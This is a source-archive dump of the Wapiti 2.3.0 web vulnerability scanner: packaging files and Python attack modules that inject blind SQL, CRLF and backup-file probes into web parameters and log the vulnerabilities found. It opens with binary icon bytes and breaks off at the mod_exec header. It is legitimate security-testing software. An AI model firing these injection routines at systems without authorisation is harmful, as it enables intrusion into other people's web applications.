Cv!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dy0U!! ,M!Dw!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Ey7` ' GFFa``baaJII $5]!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dy9d - CCB`__cbbMML""" 2Y!Dw!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx/T -% )I Cv!Dy!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Ey As1X6!   50UAr!Dy!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Ey Bt3[9"   2.R?p!Ey!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dy!Dw-P0!"<?q!Ez!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Ez!Dx As?o?o Ar!Dx!Ez!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Ez!Dy As?o?oAr!Dw!Ey!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Ey As&C + &5^!Dx!Ey!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dy!Dy!Dy!Dy!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dy!Dy!Dy!Dy!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Ey!Dx7b + ` 98d!Cv!Ez!Ey!Dy!Dy!Dy!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dy!Dy!Dy!Ey!Ez!Cv:f#= l ,  .+M9d>m>n>n Cu!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx!Dx Cv>m?n>n9f-P 2 4=    %A 
wapiti-2.3.0+dfsg/setup.cfg
[egg_info]
tag_build =
tag_date = 0
tag_svn_revision = 0

wapiti-2.3.0+dfsg/setup.py
#!/usr/bin/python
from setuptools import setup, find_packages

VERSION = "2.3.0"
DOC_DIR = "share/doc/wapiti"

doc_and_conf_files = []
doc_and_conf_files.append((DOC_DIR, ["doc/AUTHORS",
                                     "doc/ChangeLog_Wapiti",
                                     "doc/ChangeLog_lswww",
                                     "doc/example.txt",
                                     "INSTALL",
                                     "README",
                                     "TODO",
                                     "VERSION"]))
doc_and_conf_files.append(("share/man/man1", ["doc/wapiti.1.gz"]))

# Main
setup(
    name="wapiti",
    version=VERSION,
    description="A web application vulnerability scanner",
    long_description="""\
Wapiti allows you to audit the security of your web applications.
It performs "black-box" scans, i.e. it does not study the source code of the
application but will scan the webpages of the deployed webapp, looking for
scripts and forms where it can inject data.
Once it gets this list, Wapiti acts like a fuzzer, injecting payloads to see
if a script is vulnerable.""",
    url="http://wapiti.sourceforge.net/",
    author="Nicolas Surribas",
    author_email="nicolad.surribas@gmail.com",
    license="GPLv2",
    platforms=["Any"],
    packages=find_packages(),
    data_files=doc_and_conf_files,
    include_package_data=True,
    scripts=[
        "bin/wapiti",
        "bin/wapiti-cookie",
        "bin/wapiti-getcookie"
    ],
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Environment :: Console',
        'Intended Audience :: End Users/Desktop',
        'Intended Audience :: Developers',
        'Intended Audience :: System Administrators',
        'License :: OSI Approved :: GNU General Public License (GPL)',
        'Operating System :: MacOS :: MacOS X',
        'Operating System :: Microsoft :: Windows',
        'Operating System :: POSIX',
        'Operating System :: Unix',
        'Programming Language :: Python',
        'Topic :: Security',
        'Topic :: Internet :: WWW/HTTP :: Indexing/Search',
        'Topic :: Software Development :: Testing'
    ],
    install_requires=[
        'requests>=1.2.3',
        'BeautifulSoup'
    ]
)

wapiti-2.3.0+dfsg/wapiti.egg-info/

wapiti-2.3.0+dfsg/wapiti.egg-info/PKG-INFO
Metadata-Version: 1.1
Name: wapiti
Version: 2.3.0
Summary: A web application vulnerability scanner
Home-page: http://wapiti.sourceforge.net/
Author: Nicolas Surribas
Author-email: nicolad.surribas@gmail.com
License: GPLv2
Description: Wapiti allows you to audit the security of your web applications.
        It performs "black-box" scans, i.e. it does not study the source code of the
        application but will scan the webpages of the deployed webapp, looking for
        scripts and forms where it can inject data.
        Once it gets this list, Wapiti acts like a fuzzer, injecting payloads to see
        if a script is vulnerable.
Platform: Any
Classifier: Development Status :: 5 - Production/Stable
Classifier: Environment :: Console
Classifier: Intended Audience :: End Users/Desktop
Classifier: Intended Audience :: Developers
Classifier: Intended Audience :: System Administrators
Classifier: License :: OSI Approved :: GNU General Public License (GPL)
Classifier: Operating System :: MacOS :: MacOS X
Classifier: Operating System :: Microsoft :: Windows
Classifier: Operating System :: POSIX
Classifier: Operating System :: Unix
Classifier: Programming Language :: Python
Classifier: Topic :: Security
Classifier: Topic :: Internet :: WWW/HTTP :: Indexing/Search
Classifier: Topic :: Software Development :: Testing

wapiti-2.3.0+dfsg/wapiti.egg-info/SOURCES.txt
INSTALL
MANIFEST.in
README
TODO
VERSION
setup.py
bin/wapiti
bin/wapiti-cookie
bin/wapiti-getcookie
doc/AUTHORS
doc/COPYING
doc/ChangeLog_Wapiti
doc/ChangeLog_lswww
doc/cookie.ico
doc/example.txt
doc/wapiti.1.gz
doc/wapiti.ico
wapiti.egg-info/PKG-INFO
wapiti.egg-info/SOURCES.txt
wapiti.egg-info/dependency_links.txt
wapiti.egg-info/requires.txt
wapiti.egg-info/top_level.txt
wapitiCore/__init__.py
wapitiCore/attack/__init__.py
wapitiCore/attack/attack.py
wapitiCore/attack/mod_backup.py
wapitiCore/attack/mod_blindsql.py
wapitiCore/attack/mod_crlf.py
wapitiCore/attack/mod_exec.py
wapitiCore/attack/mod_file.py
wapitiCore/attack/mod_htaccess.py
wapitiCore/attack/mod_nikto.py
wapitiCore/attack/mod_permanentxss.py
wapitiCore/attack/mod_sql.py
wapitiCore/attack/mod_xss.py
wapitiCore/config/attacks/backupPayloads.txt
wapitiCore/config/attacks/blindSQLPayloads.txt
wapitiCore/config/attacks/execPayloads.txt
wapitiCore/config/attacks/fileHandlingPayloads.txt
wapitiCore/config/attacks/xssPayloads.txt
wapitiCore/config/language/de/LC_MESSAGES/wapiti.mo
wapitiCore/config/language/en/LC_MESSAGES/wapiti.mo
wapitiCore/config/language/es/LC_MESSAGES/wapiti.mo
wapitiCore/config/language/fr/LC_MESSAGES/wapiti.mo
wapitiCore/config/language/ms/LC_MESSAGES/wapiti.mo
wapitiCore/config/reports/generators.xml
wapitiCore/config/vulnerabilities/anomalies.xml
wapitiCore/config/vulnerabilities/vulnerabilities.xml
wapitiCore/file/__init__.py
wapitiCore/file/anomalyxmlparser.py
wapitiCore/file/auxtext.py
wapitiCore/file/reportgeneratorsxmlparser.py
wapitiCore/file/vulnerabilityxmlparser.py
wapitiCore/language/__init__.py
wapitiCore/language/language.py
wapitiCore/language/vulnerability.py
wapitiCore/language_sources/de.po
wapitiCore/language_sources/en.po
wapitiCore/language_sources/es.po
wapitiCore/language_sources/file_list.txt
wapitiCore/language_sources/fr.po
wapitiCore/language_sources/generateSources.sh
wapitiCore/language_sources/generateTranslations.sh
wapitiCore/language_sources/ms.po
wapitiCore/net/HTTP.py
wapitiCore/net/__init__.py
wapitiCore/net/crawlerpersister.py
wapitiCore/net/jsoncookie.py
wapitiCore/net/lamejs.py
wapitiCore/net/lswww.py
wapitiCore/net/swf_parser.py
wapitiCore/net/jsparser/__init__.py
wapitiCore/net/jsparser/jsparser.py
wapitiCore/report/__init__.py
wapitiCore/report/htmlreportgenerator.py
wapitiCore/report/jsonreportgenerator.py
wapitiCore/report/openvasreportgenerator.py
wapitiCore/report/reportgenerator.py
wapitiCore/report/reportgeneratorinfo.py
wapitiCore/report/txtreportgenerator.py
wapitiCore/report/vulneranetxmlreportgenerator.py
wapitiCore/report/xmlreportgenerator.py
wapitiCore/report_template/index.html
wapitiCore/report_template/logo_clear.png
wapitiCore/report_template/css/kube.css
wapitiCore/report_template/css/kube.min.css
wapitiCore/report_template/css/master.css
wapitiCore/report_template/js/jquery-1.9.1.min.js
wapitiCore/report_template/js/kube.buttons.js
wapitiCore/report_template/js/kube.tabs.js

wapiti-2.3.0+dfsg/wapiti.egg-info/dependency_links.txt

wapiti-2.3.0+dfsg/wapiti.egg-info/requires.txt
requests>=1.2.3
BeautifulSoup

wapiti-2.3.0+dfsg/wapiti.egg-info/top_level.txt
wapitiCore

wapiti-2.3.0+dfsg/wapitiCore/

wapiti-2.3.0+dfsg/wapitiCore/__init__.py

wapiti-2.3.0+dfsg/wapitiCore/attack/

wapiti-2.3.0+dfsg/wapitiCore/attack/__init__.py

wapiti-2.3.0+dfsg/wapitiCore/attack/attack.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2008-2013 Nicolas Surribas
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os
import socket  # for trapping socket.error
from wapitiCore.file.auxtext import AuxText
import requests
import sys

modules = ["mod_crlf", "mod_exec", "mod_file", "mod_sql", "mod_xss",
           "mod_backup", "mod_htaccess", "mod_blindsql",
           "mod_permanentxss", "mod_nikto"]


class Attack(object):
    """
    This class represents an attack, it must be extended
    for any class which implements a new type of attack
    """
    verbose = 0
    color = 0

    name = "attack"

    logVuln = None
    logAnom = None
    HTTP = None
    auxText = None

    doGET = True
    doPOST = True

    # List of modules (strs) that must be launched before the current module
    # Must be defined in the code of the module
    require = []
    # List of modules (objects) that must be launched before the current module
    # Must be left empty in the code
    deps = []

    # List of attack's url already launched in the current module
    attackedGET = []
    attackedPOST = []

    vulnerableGET = []
    vulnerablePOST = []

    CONFIG_DIR = ""
    if hasattr(sys, "frozen"):
        BASE_DIR = os.path.join(os.path.dirname(unicode(sys.executable, sys.getfilesystemencoding())), "data")
    else:
        BASE_DIR = os.path.dirname(sys.modules['wapitiCore'].__file__)
    CONFIG_DIR = os.path.join(BASE_DIR, "config", "attacks")

    # Color codes
    STD = "\033[0;0m"
    RED = "\033[0;31m"
    GREEN = "\033[0;32m"
    ORANGE = "\033[0;33m"
    YELLOW = "\033[1;33m"
    BLUE = "\033[1;34m"
    MAGENTA = "\033[0;35m"
    CYAN = "\033[0;36m"
    GB = "\033[0;30m\033[47m"

    allowed = ['php', 'html', 'htm', 'xml', 'xhtml', 'xht', 'xhtm',
               'asp', 'aspx', 'php3', 'php4', 'php5', 'txt', 'shtm',
               'shtml', 'phtm', 'phtml', 'jhtml', 'pl', 'jsp', 'cfm',
               'cfml', 'py']

    # The priority of the module, from 0 (first) to 10 (last). Default is 5
    PRIORITY = 5

    def __init__(self, http, reportGen):
        self.HTTP = http
        self.logVuln = reportGen.logVulnerability
        self.logAnom = reportGen.logAnomaly
        self.auxText = AuxText()
        self.attackedGET = []
        self.attackedPOST = []

    def setVerbose(self, verbose):
        self.verbose = verbose

    def setColor(self):
        self.color = 1

    def loadPayloads(self, fileName):
        """Load the payloads from the specified file"""
        return self.auxText.readLines(fileName)

    def attackGET(self, page, params_list, headers={}):
        return

    def attackPOST(self, form):
        return

    def loadRequire(self, obj=[]):
        self.deps = obj

    def log(self, fmt_string, *args):
        if len(args) == 0:
            print(fmt_string)
        else:
            print(fmt_string.format(*args))
        if self.color:
            sys.stdout.write(self.STD)

    def logR(self, fmt_string, *args):
        if self.color:
            sys.stdout.write(self.RED)
        self.log(fmt_string, *args)

    def logG(self, fmt_string, *args):
        if self.color:
            sys.stdout.write(self.GREEN)
        self.log(fmt_string, *args)

    def logY(self, fmt_string, *args):
        if self.color:
            sys.stdout.write(self.YELLOW)
        self.log(fmt_string, *args)

    def logC(self, fmt_string, *args):
        if self.color:
            sys.stdout.write(self.CYAN)
        self.log(fmt_string, *args)

    def logW(self, fmt_string, *args):
        if self.color:
            sys.stdout.write(self.GB)
        self.log(fmt_string, *args)

    def logM(self, fmt_string, *args):
        if self.color:
            sys.stdout.write(self.MAGENTA)
        self.log(fmt_string, *args)

    def logB(self, fmt_string, *args):
        if self.color:
            sys.stdout.write(self.BLUE)
        self.log(fmt_string, *args)

    def logO(self, fmt_string, *args):
        if self.color:
            sys.stdout.write(self.ORANGE)
        self.log(fmt_string, *args)

    def attack(self, http_resources, forms):
        if self.doGET is True:
            for http_res in http_resources:
                url = http_res.url
                if self.verbose == 1:
                    self.log(_("+ attackGET {0}"), url)
                try:
                    self.attackGET(http_res)
                except socket.error, se:
                    self.log(_('error: {0} while attacking {1}'), repr(str(se[0])), url)
                except requests.exceptions.Timeout:
                    self.log(_('error: timeout while attacking {0}'), url)
                #except Exception, e:
                #    self.log(_('error: {0} while attacking {1}'), repr(str(e[0])), url)

        if self.doPOST is True:
            for form in forms:
                if self.verbose == 1:
                    self.log(_("+ attackPOST {0} from {1}"), form.url, form.referer)
                try:
                    self.attackPOST(form)
                except socket.error, se:
                    self.log(_('error: {0} while attacking {1}'), repr(str(se[0])), form.url)
                except requests.exceptions.Timeout:
                    print(_('error: timeout while attacking {0}').format(form.url))
                # except Exception, e:
                #     self.log(_('error: {0} while attacking {1}'), repr(str(e[0])), url)

wapiti-2.3.0+dfsg/wapitiCore/attack/mod_backup.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2009-2013 Nicolas Surribas
#
# Original authors :
# Anthony DUBOCAGE
# Guillaume TRANCHANT
# Gregory FONTAINE
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from wapitiCore.attack.attack import Attack
from wapitiCore.language.vulnerability import Vulnerability
import socket
import os
from wapitiCore.net import HTTP


class mod_backup(Attack):
    """
    This class implements a "backup attack"
    """

    payloads = []
    CONFIG_FILE = "backupPayloads.txt"

    name = "backup"

    doGET = False
    doPOST = False

    def __init__(self, http, xmlRepGenerator):
        Attack.__init__(self, http, xmlRepGenerator)
        self.payloads = self.loadPayloads(os.path.join(self.CONFIG_DIR, self.CONFIG_FILE))

    def __returnErrorByCode(self, code):
        err = ""
        code = int(code)
        if code == 404:
            err = "Not found"

        if 100 <= code < 300:
            err = "ok"

        return err

    def attackGET(self, http_res):
        if http_res.file_name == "":
            return

        page = http_res.path
        headers = http_res.headers

        # Do not attack application-type files
        if not "content-type" in headers:
            # Sometimes there's no content-type... so we rely on the document extension
            if (page.split(".")[-1] not in self.allowed) and page[-1] != "/":
                return
        elif not "text" in headers["content-type"]:
            return

        for payload in self.payloads:
            payload = payload.replace("[FILE_NAME]", http_res.file_name)
            url = page.replace(http_res.file_name, payload)

            if self.verbose == 2:
                print(u"+ {0}".format(url))

            if url not in self.attackedGET:
                self.attackedGET.append(url)
                try:
                    evil_req = HTTP.HTTPResource(url)

                    resp = self.HTTP.send(evil_req)
                    data, code = resp.getPageCode()
                    err = self.__returnErrorByCode(code)
                    if err == "ok":
                        self.logR(_("Found backup file !"))
                        self.logR(u" -> {0}".format(evil_req.url))
                        self.logVuln(category=Vulnerability.BACKUP,
                                     level=Vulnerability.HIGH_LEVEL,
                                     request=evil_req,
                                     info=_("Backup file {0} found for {1}").format(url, page))

                except socket.timeout:
                    break

wapiti-2.3.0+dfsg/wapitiCore/attack/mod_blindsql.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2008-2013 Nicolas Surribas
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from wapitiCore.attack.attack import Attack
from wapitiCore.language.vulnerability import Vulnerability, Anomaly
import requests
import os
from wapitiCore.net import HTTP


class mod_blindsql(Attack):
    """
    This class implements an SQL Injection attack
    """

    CONFIG_FILE = "blindSQLPayloads.txt"
    blind_sql_payloads = []
    TIME_TO_SLEEP = 6
    name = "blindsql"
    require = ["sql"]
    PRIORITY = 6

    excludedGET = []
    excludedPOST = []

    MSG_VULN = _("Blind SQL vulnerability")

    def __init__(self, http, xmlRepGenerator):
        Attack.__init__(self, http, xmlRepGenerator)
        self.blind_sql_payloads = self.loadPayloads(os.path.join(self.CONFIG_DIR, self.CONFIG_FILE))

    def setTimeout(self, timeout):
        self.TIME_TO_SLEEP = str(1 + int(timeout))

    # first implementations for blind sql injection...
    # must add this to Vulnerability type
    def attackGET(self, http_res):
        """This method performs the Blind SQL attack with method GET"""
        page = http_res.path
        params_list = http_res.get_params
        resp_headers = http_res.headers
        referer = http_res.referer
        headers = {}
        if referer:
            headers["referer"] = referer

        if not params_list:
            # Do not attack application-type files
            if not "content-type" in resp_headers:
                # Sometimes there's no content-type... so we rely on the document extension
                if (page.split(".")[-1] not in self.allowed) and page[-1] != "/":
                    return
            elif not "text" in resp_headers["content-type"]:
                return

            pattern_url = page + "?__SQL__"
            if pattern_url in self.excludedGET:
                return

            if pattern_url not in self.attackedGET:
                self.attackedGET.append(pattern_url)
                err500 = 0
                for payload in self.blind_sql_payloads:
                    if "[VALUE]" in payload:
                        continue
                    payload = self.HTTP.quote(payload.replace("__TIME__", self.TIME_TO_SLEEP))
                    url = page + "?" + payload
                    evil_req = HTTP.HTTPResource(url)
                    if self.verbose == 2:
                        print(u"+ {0}".format(evil_req.url))
                    try:
                        resp = self.HTTP.send(evil_req, headers=headers)
                        data, code = resp.getPageCode()
                    except requests.exceptions.Timeout:
                        self.logVuln(category=Vulnerability.BLIND_SQL_INJECTION,
                                     level=Vulnerability.HIGH_LEVEL,
                                     request=evil_req,
                                     parameter="QUERY_STRING",
                                     info=_("{0} via injection in the query string").format(self.MSG_VULN))
                        self.logR(Vulnerability.MSG_QS_INJECT, self.MSG_VULN, page)
                        self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url)
                        break
                    else:
                        if code == "500" and err500 == 0:
                            err500 = 1
                            self.logAnom(category=Anomaly.ERROR_500,
                                         level=Anomaly.HIGH_LEVEL,
                                         request=evil_req,
                                         parameter="QUERY_STRING",
                                         info=Anomaly.MSG_QS_500)
                            self.logO(Anomaly.MSG_500, page)
                            self.logO(Anomaly.MSG_EVIL_URL, evil_req.url)
        else:
            for i in range(len(params_list)):
                saved_value = params_list[i][1]
                if saved_value is None:
                    saved_value = ""

                param_name = self.HTTP.quote(params_list[i][0])
                params_list[i][1] = "__SQL__"
                pattern_url = page + "?" + self.HTTP.encode(params_list)

                # This field was successfully attacked with a non-blind SQL injection
                if pattern_url in self.excludedGET:
                    params_list[i][1] = saved_value
                    continue

                if pattern_url not in self.attackedGET:
                    self.attackedGET.append(pattern_url)

                    err500 = 0
                    for payload in self.blind_sql_payloads:
                        payload = payload.replace("[VALUE]", saved_value)
                        params_list[i][1] = self.HTTP.quote(payload.replace("__TIME__", self.TIME_TO_SLEEP))
                        url = page + "?" + self.HTTP.encode(params_list)
                        evil_req = HTTP.HTTPResource(url)
                        if self.verbose == 2:
                            print(u"+ {0}".format(evil_req.url))
                        try:
                            resp = self.HTTP.send(evil_req, headers=headers)
                            data, code = resp.getPageCode()
                        except requests.exceptions.Timeout:
                            self.logVuln(category=Vulnerability.BLIND_SQL_INJECTION,
                                         level=Vulnerability.HIGH_LEVEL,
                                         request=evil_req,
                                         parameter=param_name,
                                         info=_("{0} via injection in "
                                                "the parameter {1}").format(self.MSG_VULN, param_name))
                            self.logR(Vulnerability.MSG_PARAM_INJECT,
                                      self.MSG_VULN,
                                      page,
                                      param_name)
                            self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url)
                            # One payload worked. Now jump to next field
                            break
                        else:
                            if code == "500" and err500 == 0:
                                err500 = 1
                                self.logAnom(category=Anomaly.ERROR_500,
                                             level=Anomaly.HIGH_LEVEL,
                                             request=evil_req,
                                             parameter=param_name,
                                             info=Anomaly.MSG_PARAM_500.format(param_name))
                                self.logO(Anomaly.MSG_500, page)
                                self.logO(Anomaly.MSG_EVIL_URL, evil_req.url)
                params_list[i][1] = saved_value

    def attackPOST(self, form):
        """This method performs the Blind SQL attack with method POST"""

        # copies
        get_params = form.get_params
        post_params = form.post_params
        file_params = form.file_params
        referer = form.referer

        for params_list in [get_params, post_params, file_params]:
            for i in xrange(len(params_list)):
                saved_value = params_list[i][1]
                if saved_value is None:
                    saved_value = ""

                param_name = self.HTTP.quote(params_list[i][0])

                if params_list is file_params:
                    params_list[i][1] = ["_SQL__", params_list[i][1][1]]
                else:
                    params_list[i][1] = "__SQL__"

                attack_pattern = HTTP.HTTPResource(form.path,
                                                   method=form.method,
                                                   get_params=get_params,
                                                   post_params=post_params,
                                                   file_params=file_params)

                if attack_pattern in self.excludedPOST:
                    params_list[i][1] = saved_value
                    continue

                err500 = 0
                if attack_pattern not in self.attackedPOST:
                    self.attackedPOST.append(attack_pattern)
                    for payload in self.blind_sql_payloads:
                        if params_list is file_params:
                            payload = payload.replace("[VALUE]", saved_value[0])
                            params_list[i][1][0] = payload.replace("__TIME__", self.TIME_TO_SLEEP)
                        else:
                            payload = payload.replace("[VALUE]", saved_value)
                            params_list[i][1] = payload.replace("__TIME__", self.TIME_TO_SLEEP)

                        evil_req = HTTP.HTTPResource(form.path,
                                                     method=form.method,
                                                     get_params=get_params,
                                                     post_params=post_params,
                                                     file_params=file_params,
                                                     referer=referer)

                        if self.verbose == 2:
                            print(u"+ {0}".format(evil_req))

                        try:
                            resp = self.HTTP.send(evil_req)
                            data, code = resp.getPageCode()
                        except requests.exceptions.Timeout:
                            # Timeout means time-based SQL injection
                            self.logVuln(category=Vulnerability.BLIND_SQL_INJECTION,
                                         level=Vulnerability.HIGH_LEVEL,
                                         request=evil_req,
                                         parameter=param_name,
                                         info=_("{0} via injection in the "
                                                "parameter {1}").format(self.MSG_VULN, param_name))
                            self.logR(Vulnerability.MSG_PARAM_INJECT,
                                      self.MSG_VULN,
                                      evil_req.url,
                                      param_name)
                            self.logR(Vulnerability.MSG_EVIL_REQUEST)
                            self.logC(evil_req.http_repr)
                            print('')
                            break
                        else:
                            if code == "500" and err500 == 0:
                                err500 = 1
                                self.logAnom(category=Anomaly.ERROR_500,
                                             level=Anomaly.HIGH_LEVEL,
                                             request=evil_req,
                                             parameter=param_name,
                                             info=Anomaly.MSG_PARAM_500.format(param_name))
                                self.logO(Anomaly.MSG_500, evil_req.url)
                                self.logO(Anomaly.MSG_EVIL_REQUEST)
                                self.logC(evil_req.http_repr)
                                print('')
                params_list[i][1] = saved_value

    def loadRequire(self, obj=[]):
        self.deps = obj
        for x in self.deps:
            if x.name == "sql":
                self.excludedGET = x.vulnerableGET
                self.excludedPOST = x.vulnerablePOST

wapiti-2.3.0+dfsg/wapitiCore/attack/mod_crlf.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2008-2013 Nicolas Surribas
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
from wapitiCore.attack.attack import Attack
from wapitiCore.language.vulnerability import Vulnerability, Anomaly
import requests
from wapitiCore.net import HTTP


class mod_crlf(Attack):
    """
    This class implements a CRLF attack
    """

    name = "crlf"
    MSG_VULN = _("CRLF Injection")
    doGET = False
    doPOST = False

    def __init__(self, http, xmlRepGenerator):
        Attack.__init__(self, http, xmlRepGenerator)

    # Won't work with PHP >= 4.4.2
    def attackGET(self, http_res):
        """This method performs the CRLF attack with method GET"""
        page = http_res.path
        params_list = http_res.get_params
        resp_headers = http_res.headers
        referer = http_res.referer
        headers = {}
        if referer:
            headers["referer"] = referer

        payload = self.HTTP.quote("http://www.google.fr\r\nwapiti: 2.3.0 version")
        if not params_list:
            # Do not attack application-type files
            if not "content-type" in resp_headers:
                # Sometimes there's no content-type... so we rely on the document extension
                if (page.split(".")[-1] not in self.allowed) and page[-1] != "/":
                    return
            elif not "text" in resp_headers["content-type"]:
                return

            url = page + "?" + payload
            if url not in self.attackedGET:
                evil_req = HTTP.HTTPResource(url)
                if self.verbose == 2:
                    print(u"+ {0}".format(evil_req.url))
                try:
                    resp = self.HTTP.send(evil_req, headers=headers)
                    if "wapiti" in resp.getHeaders():
                        self.logVuln(category=Vulnerability.CRLF,
                                     level=Vulnerability.HIGH_LEVEL,
                                     request=evil_req,
                                     info=self.MSG_VULN + " " + _("(QUERY_STRING)"))
                        self.logR(Vulnerability.MSG_QS_INJECT, self.MSG_VULN, page)
                        self.logR(Vulnerability.MSG_EVIL_URL, url)
                except requests.exceptions.Timeout:
                    self.logAnom(category=Anomaly.RES_CONSUMPTION,
                                 level=Anomaly.MEDIUM_LEVEL,
                                 request=evil_req,
                                 info=self.MSG_VULN + " " + _("(QUERY_STRING)"))
                    self.logO(Anomaly.MSG_TIMEOUT, page)
                    self.logO(Anomaly.MSG_EVIL_URL, url)
                except requests.exceptions.HTTPError:
                    # print("Error: The server did not understand this request")
                    pass
                self.attackedGET.append(url)
        else:
            for i in range(len(params_list)):
                saved_value = params_list[i][1]
                if saved_value is None:
                    saved_value = ""
                # payload is already escaped, see at top
                params_list[i][1] = payload
                param_name = self.HTTP.quote(params_list[i][0])

                url = page + "?" + self.HTTP.encode(params_list)
                if url not in self.attackedGET:
                    self.attackedGET.append(url)
                    evil_req = HTTP.HTTPResource(url)
                    if self.verbose == 2:
                        print(u"+ {0}".format(evil_req.url))
                    try:
                        resp = self.HTTP.send(evil_req, headers=headers)
                        if "wapiti" in resp.getHeaders():
                            self.logVuln(category=Vulnerability.CRLF,
                                         level=Vulnerability.HIGH_LEVEL,
                                         request=evil_req,
                                         parameter=param_name,
                                         info=self.MSG_VULN + " (" + param_name + ")")
                            self.logR(Vulnerability.MSG_PARAM_INJECT,
                                      self.MSG_VULN,
                                      page,
                                      param_name)
                            self.logR(Vulnerability.MSG_EVIL_URL, url)
                    except requests.exceptions.Timeout:
                        self.logAnom(category=Anomaly.RES_CONSUMPTION,
                                     level=Anomaly.MEDIUM_LEVEL,
                                     request=evil_req,
                                     parameter=param_name,
                                     info="Timeout (" + param_name + ")")
                        self.logO(Anomaly.MSG_TIMEOUT, page)
                        self.logO(Anomaly.MSG_EVIL_URL, url)
                    except requests.exceptions.HTTPError:
                        self.log(_("Error: The server did not understand this request"))
                params_list[i][1] = saved_value

wapiti-2.3.0+dfsg/wapitiCore/attack/mod_exec.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of the Wapiti project (http://wapiti.sourceforge.net)
# Copyright (C) 2008-2013 Nicolas Surribas
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
